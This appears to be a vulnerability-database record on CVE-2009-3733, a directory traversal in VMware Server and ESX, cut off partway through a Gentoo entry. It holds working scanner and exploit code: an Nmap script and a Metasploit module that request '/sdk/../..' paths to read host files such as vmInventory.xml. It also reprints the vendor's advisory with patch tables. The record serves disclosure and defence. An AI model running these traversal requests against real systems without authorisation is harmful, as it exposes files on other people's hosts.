Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\n]]\n\n---\n-- @usage\n-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\n--\n-- @output\n--| http-vmware-path-vuln: \n--| VMWare path traversal (CVE-2009-3733): VULNERABLE\n--| /vmware/Windows 2003/Windows 2003.vmx\n--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\n--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\n--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\n--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\n--| /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\n--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\n-----------------------------------------------------------------------\n\nauthor = \"Ron 
Bowes\"\nlicense = \"Same as Nmap--See http://www.exampel.com/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\", \"default\"}\n\nrequire \"http\"\nrequire \"shortport\"\n\nportrule = shortport.port_or_service({80, 443, 8222,8333}, {\"http\", \"https\"})\n\nlocal function get_file(host, port, path)\n\tlocal file\n\n\t-- Replace spaces in the path with %20\n\tpath = string.gsub(path, \" \", \"%%20\")\n\n\t-- Try both ../ and %2E%2E/\n\tfile = \"/sdk/../../../../../../\" .. path\n\n\tlocal result = http.get( host, port, file)\n\tif(result['status'] ~= 200 or result['content-length'] == 0) then\n\t\tfile = \"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/\" .. path\n\t\tresult = http.get( host, port, file)\n\n\t\tif(result['status'] ~= 200 or result['content-length'] == 0) then\n\t\t\treturn false, \"Couldn't download file: \" .. path\n\t\tend\n\tend\n\n\treturn true, result.body, file\nend\n\nlocal function fake_xml_parse(str, tag)\n\tlocal result = {}\n\tlocal index, tag_start, tag_end\n\n\t-- Lowercase the 'body' we're searching\n\tlocal lc = string.lower(str)\n\t-- Lowrcase the tag\n\ttag = string.lower(tag)\n\n\t-- This loop does some ugly pattern-based xml parsing\n\tindex, tag_start = string.find(lc, \"<\" .. tag .. \">\")\n\twhile index do\n\t\ttag_end, index = string.find(lc, \"</\" .. tag .. \">\", index)\n\t\ttable.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase\n\t\tindex, tag_start = string.find(lc, \"<\" .. tag .. \">\", index)\n\tend\n\n\treturn result\nend\n\n--local function parse_vmware_conf(str, field)\n--\tlocal index, value_start = string.find(str, field .. 
\"[^\\\"]*\")\n--\tif(not(index) or not(value_start)) then\n--\t\treturn nil\n--\tend\n--\n--\tlocal value_end = string.find(str, \"\\\"\", value_start + 1)\n--\tif(not(value_end)) then\n--\t\treturn nil\n--\tend\n--\n--\treturn string.sub(str, value_start + 1, value_end - 1)\n--end\n\nlocal function go(host, port)\n\tlocal result, body\n\tlocal files\n\n\t-- Try to download the file\n\tresult, body = get_file(host, port, \"/etc/vmware/hostd/vmInventory.xml\");\n\t-- It failed -- probably not vulnerable\n\tif(not(result)) then\n\t\treturn false, \"Couldn't download file: \" .. body\n\tend\n\n\t-- Check if the file contains the proper XML\n\tif(string.find(string.lower(body), \"configroot\") == nil) then\n\t\treturn false, \"Server didn't return XML -- likely not vulnerable.\"\n\tend\n\n\tfiles = fake_xml_parse(body, \"vmxcfgpath\")\n\n\tif(#files == 0) then\n\t\treturn true, {\"No VMs appear to be installed\"}\n\tend\n\n\t-- Process each of the .vmx files if verbosity is on\n--\tif(nmap.verbosity() > 1) then\n--\t\tlocal result, file = get_file(host, port, files[1])\n--io.write(nsedebug.tostr(file))\n--\tend\n\n\treturn true, files\nend\n\naction = function(host, port)\n\t-- Try a standard ../ path\n\tlocal status, result = go(host, port)\n\n\tif(not(status)) then\n\t\treturn nil\n\tend\n\n\tlocal response = {}\n\ttable.insert(response, \"VMWare path traversal (CVE-2009-3733): VULNERABLE\")\n\n\tif(nmap.verbosity() > 1) then\n\t\ttable.insert(response, result)\n\tend\n\n\treturn stdnse.format_output(true, response)\nend", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "description": "Directory traversal vulnerability\n\nVulnerability Type: File Disclosure", "modified": "2013-04-02T00:00:00", "published": "2012-03-18T00:00:00", "id": "E-193", "href": "", "type": "dsquare", "title": "Vmware Server File Disclosure", "sourceData": "For the 
exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-03-09T05:35:26", "description": "This module exploits the VMware Server Directory Traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5, which allows remote attackers to read arbitrary files. Common VMware server ports are 80/8222 and 443/8333 (SSL). If you want to download the entire VM, check out the gueststealer tool.\n", "published": "2015-06-08T09:58:22", "type": "metasploit", "title": "VMware Server Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3733"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_SERVER_DIR_TRAV", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::HttpClient\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'VMware Server Directory Traversal Vulnerability',\n 'Description' => 'This modules exploits the VMware Server Directory Traversal\n vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before\n 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5\n allows remote attackers to read arbitrary files. Common VMware server ports\n 80/8222 and 443/8333 SSL. 
If you want to download the entire VM, check out\n the gueststealer tool.',\n 'Author' => 'CG' ,\n 'License' => MSF_LICENSE,\n 'References'\t=>\n [\n [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],\n [ 'OSVDB', '59440' ],\n [ 'BID', '36842' ],\n [ 'CVE', '2009-3733' ],\n [ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]\n ]\n )\n register_options(\n [\n Opt::RPORT(8222),\n OptString.new('FILE', [ true, \"The file to view\", '/etc/vmware/hostd/vmInventory.xml']),\n OptString.new('TRAV', [ true, \"Traversal Depth\", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),\n ])\n end\n\n def run_host(target_host)\n\n begin\n file = datastore['FILE']\n trav = datastore['TRAV']\n res = send_request_raw({\n 'uri' => trav+file,\n 'version' => '1.1',\n 'method' => 'GET'\n }, 25)\n\n if res.nil?\n print_error(\"Connection timed out\")\n return\n end\n\n if res.code == 200\n #print_status(\"Output Of Requested File:\\n#{res.body}\")\n print_good(\"#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability\")\n report_vuln(\n {\n :host => target_host,\n :port\t=> rport,\n :proto => 'tcp',\n :name\t=> self.name,\n :info => \"Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }\n )\n else\n vprint_status(\"Received #{res.code} for #{trav}#{file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n print_error(e.message)\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb"}], "vmware": [{"lastseen": "2019-11-06T16:05:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2267", "CVE-2009-3733"], "description": "a. 
Mishandled exception on page faults \n \nAn improper setting of the exception code on page faults may allow for local privilege escalation on the guest operating system. This vulnerability does not affect the host system. \nVMware would like to thank Tavis Ormandy and Julien Tinnes of the Google Security Team for reporting this issue to us. \nThe Common Vulnerabilities and Exposures project ([cve.mitre.org](<http://www.cve.mitre.org/>)) has assigned the name CVE-2009-2267 to this issue. \nThe following table lists what action remediates the vulnerability (column 4) if a solution is available. \n\n", "edition": 4, "modified": "2009-10-27T00:00:00", "published": "2009-10-27T00:00:00", "id": "VMSA-2009-0015", "href": "https://www.vmware.com/security/advisories/VMSA-2009-0015.html", "title": "VMware hosted products and ESX patches resolve two security issues", "type": "vmware", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-2267", "CVE-2009-3733"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2009-0015\r\nSynopsis: VMware hosted products and ESX patches resolve two\r\n security issues\r\nIssue date: 2009-10-27\r\nUpdated on: 2009-10-27 (initial release of advisory)\r\nCVE numbers: CVE-2009-2267 CVE-2009-3733\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware hosted products and ESX patches resolve two security issues.\r\n\r\n2. 
Relevant releases\r\n\r\n VMware Workstation 6.5.2 and earlier,\r\n VMware Player 2.5.2 and earlier,\r\n VMware ACE 2.5.2 and earlier,\r\n VMware Server 2.0.1 and earlier,\r\n VMware Server 1.0.9 and earlier,\r\n VMware Fusion 2.0.5 and earlier,\r\n\r\n VMware ESXi 4.0 without patch ESXi400-200909401-BG,\r\n\r\n VMware ESXi 3.5 without patches ESXe350-200910401-I-SG,\r\n ESXe350-200901401-I-SG,\r\n\r\n VMware ESX 4.0 without patch ESX400-200909401-BG,\r\n\r\n VMware ESX 3.5 without patches ESX350-200910401-SG\r\n ESX350-200901401-SG,\r\n\r\n VMware ESX 3.0.3 without patches ESX303-200910401-BG,\r\n ESX303-200812406-BG,\r\n\r\n VMware ESX 2.5.5 without Upgrade Patch 15.\r\n\r\n Extended support for ESX 2.5.5 ends on 2010-06-15. Users should plan\r\n to upgrade to at least ESX 3.0.3 and preferably to the newest\r\n release available.\r\n\r\n Extended support for ESX 3.0.3 ends on 2011-12-10. Users should plan\r\n to upgrade to at least ESX 3.5 and preferably to the newest release\r\n available.\r\n\r\n3. Problem Description\r\n\r\n a. Mishandled exception on page faults\r\n\r\n An improper setting of the exception code on page faults may allow\r\n for local privilege escalation on the guest operating system. This\r\n vulnerability does not affect the host system.\r\n\r\n VMware would like to thank Tavis Ormandy and Julien Tinnes of the\r\n Google Security Team for reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2009-2267 to this issue.\r\n\r\n The following table lists what action remediates the vulnerability\r\n (column 4) if a solution is available. 
See above for remediation\r\n details.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n VirtualCenter any Windows not affected\r\n\r\n Workstation 6.5.x any 6.5.3 build 185404 or later\r\n \r\n Player 2.5.x any 2.5.3 build 185404 or later\r\n \r\n ACE 2.5.x any 2.5.3 build 185404 or later \r\n \r\n Server 2.x any 2.0.2 build 203138 or later\r\n Server 1.x any 1.0.10 build 203137 or later\r\n\r\n Fusion 2.x Mac OS/X 2.0.6 build 196839 or later\r\n\r\n ESXi 4.0 ESXi ESXi400-200909401-BG\r\n ESXi 3.5 ESXi ESXe350-200910401-I-SG\r\n\r\n ESX 4.0 ESX ESX400-200909401-BG\r\n ESX 3.5 ESX ESX350-200910401-SG\r\n ESX 3.0.3 ESX ESX303-200910401-BG\r\n ESX 2.5.5 ESX Upgrade Patch 15\r\n\r\n b. Directory Traversal vulnerability\r\n\r\n A directory traversal vulnerability allows for remote retrieval of\r\n any file from the host system. In order to send a malicious request,\r\n the attacker will need to have access to the network on which the\r\n host resides.\r\n\r\n VMware would like to thank Justin Morehouse and Jason Kratzer for\r\n independently reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2009-3733 to this issue.\r\n\r\n The following table lists what action remediates the vulnerability\r\n (column 4) if a solution is available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======== ======= =================\r\n VirtualCenter any Windows not affected\r\n\r\n Workstation any any not affected\r\n\r\n Player any any not affected\r\n\r\n ACE any Windows not affected\r\n\r\n Server 2.x Windows not affected\r\n Server 2.x Linux 2.0.2 build 203138 or later\r\n Server 1.x Windows not affected\r\n Server 1.x Linux 1.0.10 build 203137 or later\r\n\r\n Fusion 2.x Mac OS/X not affected\r\n\r\n ESXi 4.0 ESXi not affected\r\n ESXi 3.5 ESXi ESXe350-200901401-I-SG 
\r\n\r\n ESX 4.0 ESX not affected\r\n ESX 3.5 ESX ESX350-200901401-SG\r\n ESX 3.0.3 ESX ESX303-200812406-BG\r\n ESX 2.5.5 ESX not affected\r\n\r\n Note: On ESX these vulnerabilities can be exploited remotely only\r\n if the attacker has access to the Service Console network.\r\n\r\n Security best practices provided by VMware recommend that the\r\n Service Console be isolated from the VM network. Please see\r\n http://www.vmware.com/resources/techresources/726 for more\r\n information on VMware security best practices.\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and version\r\n and verify the md5sum and/or the sha1sum of your downloaded file.\r\n\r\n VMware Workstation 6.5.3\r\n ------------------------\r\n http://www.vmware.com/download/ws/\r\n Release notes:\r\n http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html\r\n\r\n For Windows\r\n\r\n Workstation for Windows 32-bit and 64-bit\r\n Windows 32-bit and 64-bit .exe\r\n md5sum: 7565d16b7d7e0173b90c3b76ca4656bc\r\n sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1\r\n \r\n For Linux\r\n\r\n Workstation for Linux 32-bit\r\n Linux 32-bit .rpm\r\n md5sum: 4d55c491bd008ded0ea19f373d1d1fd4\r\n sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e\r\n\r\n Workstation for Linux 32-bit\r\n Linux 32-bit .bundle\r\n md5sum: d4a721c1918c0e8a87c6fa4bad49ad35\r\n sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5\r\n\r\n Workstation for Linux 64-bit\r\n Linux 64-bit .rpm\r\n md5sum: 72adfdb03de4959f044fcb983412ae7c\r\n sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb\r\n\r\n Workstation for Linux 64-bit\r\n Linux 64-bit .bundle\r\n md5sum: 83e1f0c94d6974286256c4d3b559e854\r\n sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542\r\n\r\n\r\n VMware Player 2.5.3\r\n -------------------\r\n http://www.vmware.com/download/player/\r\n Release notes:\r\n http://www.vmware.com/support/player25/doc/releasenotes_player253.html\r\n\r\n Player for Windows binary\r\n 
\r\nhttp://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.ex\r\ne\r\n md5sum: fe28f193374c9457752ee16cd6cad4e7\r\n sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04\r\n\r\n Player for Linux (.rpm)\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i3\r\n86.rpm\r\n md5sum: c99cd65f19fdfc7651bcb7f328b73bc2\r\n sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e\r\n\r\n Player for Linux (.bundle)\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i3\r\n86.bundle\r\n md5sum: 210f4cb5615bd3b2171bc054b9b2bac5\r\n sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b\r\n\r\n Player for Linux - 64-bit (.rpm)\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x8\r\n6_64.rpm\r\n md5sum: f91576ef90b322d83225117ae9335968\r\n sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974\r\n\r\n Player for Linux - 64-bit (.bundle)\r\n \r\nhttp://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x8\r\n6_64.bundle\r\n md5sum: 595d44d7945c129b1aeb679d2f001b05\r\n sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4\r\n\r\n\r\n VMware ACE 2.5.3\r\n ----------------\r\n http://www.vmware.com/download/ace/\r\n Release notes:\r\n http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html\r\n\r\n ACE Management Server Virtual Appliance\r\n AMS Virtual Appliance .zip\r\n md5sum: 44cc7b86353047f02cf6ea0653e38418\r\n sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1\r\n\r\n VMware ACE for Windows 32-bit and 64-bit\r\n Windows 32-bit and 64-bit .exe\r\n md5sum: 0779da73408c5e649e0fd1c62d23820f\r\n sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef\r\n\r\n ACE Management Server for Windows\r\n Windows .exe\r\n md5sum: 0779da73408c5e649e0fd1c62d23820f\r\n sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef\r\n\r\n ACE Management Server for SUSE Enterprise Linux 9\r\n SLES 9 .rpm\r\n md5sum: a4fc92d7197f0d569361cdf4b8cca642\r\n sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75\r\n\r\n ACE 
Management Server for Red Hat Enterprise Linux 4\r\n RHEL 4 .rpm\r\n md5sum: 841005151338c8b954f08d035815fd58\r\n sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e\r\n\r\n\r\n VMware Server 2.0.2\r\n -------------------\r\n http://www.vmware.com/download/server/\r\n Release notes:\r\n http://www.vmware.com/support/server2/doc/releasenotes_vmserver202.html\r\n\r\n VMware Server 2\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 507 MB EXE image VMware Server 2 for Windows Operating Systems. A\r\n master installer file containing all Windows components of VMware\r\n Server.\r\n md5sum: a6430bcc16ff7b3a29bb8da1704fc38a\r\n sha1sum: 39683e7333732cf879ff0b34f66e693dde0e340b\r\n\r\n VIX API 1.6 for Windows\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 37 MB image\r\n md5sum: 827e65e70803ec65ade62dd27a74407a\r\n sha1sum: a14281bc055271a19be3c88026e92304bc3f0e22\r\n\r\n For Linux\r\n\r\n VMware Server 2 for Linux Operating Systems.\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 37 MB TAR image\r\n md5sum: 95ddea5a0579a35887bd15b083ffea20\r\n sha1sum: 14cf12063a7480f240ccd96178ad4258cb26a747\r\n\r\n VMware Server 2 for Linux Operating Systems 64-bit version.\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 452 MB RPM image\r\n md5sum: 35c8b176601133749e4055e0034f8be6\r\n sha1sum: e8dc842d89899df5cd3e1136af76f19ca5ccbece\r\n\r\n The core application needed to run VMware Server 2, 64-bit version.\r\n Version 2.0.2 | 203138 - 10/26/09\r\n 451 MB TAR image\r\n md5sum: cc7aef813008eeb7150c21547d431b39\r\n sha1sum: b65d3d46dc947fc7995bda354c4947afabd23474\r\n \r\n VMware Server 1.0.10\r\n --------------------\r\n http://www.vmware.com/download/server/\r\n Release notes:\r\n http://www.vmware.com/support/server/doc/releasenotes_server.html\r\n\r\n VMware Server for Windows 32-bit and 64-bit\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-installer-1.0.1\r\n0-203137.exe\r\n md5sum: 867abd4843f88908ba2dbaf4547a1190\r\n sha1sum: 780e61ac190dd2b6524c8c7792564b7548c4d5a1\r\n\r\n VMware 
Server Windows client package\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-win32-client-1.\r\n0.10-203137.zip\r\n md5sum: f7a4eb7f48e42b9040a73721e6d61b7f\r\n sha1sum: 3a209d0fc86dbc69881614fdeb084e9c7d343f5a\r\n\r\n VMware Server for Linux\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-1.0.10-203137.t\r\nar.gz\r\n md5sum: eb127d30dbd5f7f08e5d129d68cb0d21\r\n sha1sum: f21ed65a500b2176166d90ed2821892ce1cb1fd5\r\n\r\n VMware Server for Linux rpm\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-1.0.10-203137.i\r\n386.rpm\r\n md5sum: fd4416bcc1c53d83b493b9d941a4701c\r\n sha1sum: aba35050f23cfbe027e004547559e78a38bcb6a1\r\n\r\n Management Interface\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-mui-1.0.10-203137.tar.\r\ngz\r\n md5sum: 0f01e9bdeee3fa2aa84f87f66b69dc83\r\n sha1sum: 3b6a5b222cece1de97e9513717e25178e79707e6\r\n\r\n VMware Server Linux client package\r\n \r\nhttp://download3.vmware.com/software/vmserver/VMware-server-linux-client-1.\r\n0.10-203137.zip\r\n md5sum: 542c5aa052c9a197c4f5eeca6c3d88cc\r\n sha1sum: 3f92c98153f5d9dcbbcd0cd524683a6832aaa10e\r\n\r\n\r\n VMware Fusion 2.0.6\r\n -------------------\r\n VMware Fusion 2.0.6 (for Intel-based Macs): Download including\r\n VMware Fusion and a 12 month complimentary subscription to McAfee\r\n VirusScan Plus 2009\r\n md5sum: d35490aa8caa92e21339c95c77314b2f\r\n sha1sum: 9c41985d754ac718032a47af8a3f98ea28fddb26\r\n\r\n VMware Fusion 2.0.6 (for Intel-based Macs): Download including only\r\n VMware Fusion software\r\n md5sum: 2e8d39defdffed224c4bab4218cc6659\r\n sha1sum: 453d54a2f37b257a0aad17c95843305250c7b6ef\r\n\r\n Release notes\r\n www.vmware.com/support/fusion2/doc/releasenotes_fusion_206.html\r\n\r\n\r\n ESXi\r\n ----\r\n ESXi 4.0 patch ESXi400-200909401-BG (Privilege Escalation)\r\n \r\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-149-20090917-785\r\n671/ESXi400-200909001.zip\r\n md5sum: 
8e095684c54df259eaf5705f5bfc1463\r\n sha1sum: 8f3174c119ba27269c5bb9b0767fc72778438ade\r\n http://kb.vmware.com/kb/1014026\r\n\r\n ESXi 3.5 patch ESXe350-200910401-I-SG (Privilege Escalation)\r\n http://download3.vmware.com/software/vi/ESXe350-200910401-O-SG.zip\r\n md5sum: 947874a28a7f85caffc884c6ff3a0a60\r\n http://kb.vmware.com/kb/1014761\r\n\r\n ESXi 3.5 patch ESXe350-200901401-I-SG (Directory Traversal)\r\n http://download3.vmware.com/software/vi/ESXe350-200901401-O-SG.zip\r\n md5sum: 588dc7bfdee4e4c5ac626906c37fc784 \r\n http://kb.vmware.com/kb/1006661\r\n\r\n NOTES: The three ESXi patches for Firmware "I", VMware Tools "T,"\r\n and the VI Client "C" are contained in a single offline "O"\r\n download file.\r\n\r\n\r\n ESX\r\n ---\r\n ESX 4.0 patch ESX400-200909401-BG (Privilege Escalation)\r\n \r\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-150-20090917-796\r\n862/ESX400-200909001.zip\r\n md5sum: b1487ab823746a83b897caa9d9329f48\r\n sha1sum: f426a11ec6420d9bd2f45f6ca30773a839cb3a65\r\n http://kb.vmware.com/kb/1014019\r\n\r\n Note: ESX400-200909001 contains the bundle with the security fix,\r\n ESX400-200909401-BG\r\n To install an individual bulletin use esxupdate with the -b option.\r\n esxupdate --bundle ESX400-200909001 -b ESX400-200909401-BG\r\n\r\n ESX 3.5 patch ESX350-200910401-SG (Privilege Escalation)\r\n http://download3.vmware.com/software/vi/ESX350-200910401-SG.zip\r\n md5sum: 73435b0495a61b00bedbead140b2a262\r\n sha1sum: a957d57cf0df58d8a40759dce62efbf12a6c229c\r\n http://kb.vmware.com/kb/1013124\r\n\r\n ESX 3.5 patch ESX350-200901401-SG (Directory Traversal)\r\n http://download3.vmware.com/software/vi/ESX350-200901401-SG.zip\r\n md5sum: 2769ac30078656b01ca1e2fdfa3230e9 \r\n http://kb.vmware.com/kb/1006651\r\n\r\n ESX 3.0.3 patch ESX303-200910401-BG (Privilege Escalation)\r\n http://download3.vmware.com/software/vi/ESX303-200910401-BG.zip\r\n md5sum: c7c8f76a2a704c1818eeb54500c28d1c\r\n http://kb.vmware.com/kb/1014759\r\n\r\n ESX 
3.0.3 patch ESX303-200812406-BG (Directory Traversal)\r\n http://download3.vmware.com/software/vi/ESX303-200812406-BG.zip\r\n md5sum: 94ff158e94dd7a0e5b1e5e7aade7a523\r\n http://kb.vmware.com/kb/1007215\r\n\r\n ESX 2.5.5 Upgrade Patch 15 (Privilege Escalation)\r\n http://download3.vmware.com/software/esx/esx-2.5.5-191611-upgrade.tar.gz\r\n md5sum: c346fe510b6e51145570e03083f77357\r\n sha1sum: ef6b19247825fb3fe2c55f8fda3cdd05ac7bb1f4\r\n http://www.vmware.com/support/esx25/doc/esx-255-200910-patch.html\r\n\r\n\r\n5. References\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2267\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733\r\n \r\n \r\n6. Change log\r\n\r\n2009-10-27 VMSA-2009-0015\r\nInitial security advisory after release of Server 1.0.10, Server 2.0.2\r\nand Upgrade Patch 15 for ESX 2.5.5 on 2009-10-27. The versions of\r\nWorkstation, Player, ACE, Fusion, and patches for ESXi 4.0, ESXi 3.5,\r\nESX 4.0, ESX 3.5, ESX 3.0.3 mentioned above have already been released.\r\n\r\n- -----------------------------------------------------------------------\r\n7. Contact\r\n\r\nE-mail list for product security notifications and announcements:\r\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\nThis Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\nE-mail: security at vmware.com\r\nPGP key at: http://kb.vmware.com/kb/1055\r\n\r\nVMware Security Center\r\nhttp://www.vmware.com/security\r\n\r\nVMware security response policy\r\nhttp://www.vmware.com/support/policies/security_response.html\r\n\r\nGeneral support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos.html\r\n\r\nVMware Infrastructure support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos_vi.html\r\n\r\nCopyright 2009 VMware Inc. 
All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 9.8.3 (Build 4028)\r\nCharset: utf-8\r\n\r\nwj8DBQFK50xMS2KysvBH1xkRAtDQAJ4j8i4FSanVEdj2zXOKGhz+jCN9ogCeJTow\r\nByoB8aJdMwQ3mswOBWDjR5k=\r\n=0Ncp\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-10-29T00:00:00", "published": "2009-10-29T00:00:00", "id": "SECURITYVULNS:DOC:22713", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22713", "title": "VMSA-2009-0015 VMware hosted products and ESX patches resolve two security issues", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-2267", "CVE-2009-3733"], "description": "Privilege escalation in guest system. Directory traversal on access from guest to host system.", "edition": 1, "modified": "2009-10-29T00:00:00", "published": "2009-10-29T00:00:00", "id": "SECURITYVULNS:VULN:10360", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10360", "title": "VMWare multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:55", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0967", "CVE-2008-2101", "CVE-2007-5503", "CVE-2008-4915", "CVE-2009-3707", "CVE-2008-2098", "CVE-2008-1361", "CVE-2008-4916", "CVE-2008-1447", "CVE-2008-1392", "CVE-2009-3732", "CVE-2008-1808", "CVE-2010-1137", "CVE-2009-0040", "CVE-2007-5269", "CVE-2010-1139", "CVE-2010-1142", "CVE-2008-1364", "CVE-2009-2267", "CVE-2008-2100", "CVE-2009-0910", "CVE-2010-1138", "CVE-2010-1143", "CVE-2010-1140", "CVE-2009-1244", "CVE-2011-3868", "CVE-2008-1363", "CVE-2007-5671", "CVE-2008-1340", "CVE-2009-3733", "CVE-2008-4917", "CVE-2008-1807", "CVE-2009-0909", "CVE-2009-4811", "CVE-2008-1362", "CVE-2008-1806", "CVE-2010-1141"], "description": "### 
Background\n\nVMware Player, Server, and Workstation allow emulation of a complete PC on a PC without the usual performance overhead of most emulators. \n\n### Description\n\nMultiple vulnerabilities have been discovered in VMware Player, Server, and Workstation. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nLocal users may be able to gain escalated privileges, cause a Denial of Service, or gain sensitive information. \n\nA remote attacker could entice a user to open a specially crafted file, possibly resulting in the remote execution of arbitrary code, or a Denial of Service. Remote attackers also may be able to spoof DNS traffic, read arbitrary files, or inject arbitrary web script to the VMware Server Console. \n\nFurthermore, guest OS users may be able to execute arbitrary code on the host OS, gain escalated privileges on the guest OS, or cause a Denial of Service (crash the host OS). \n\n### 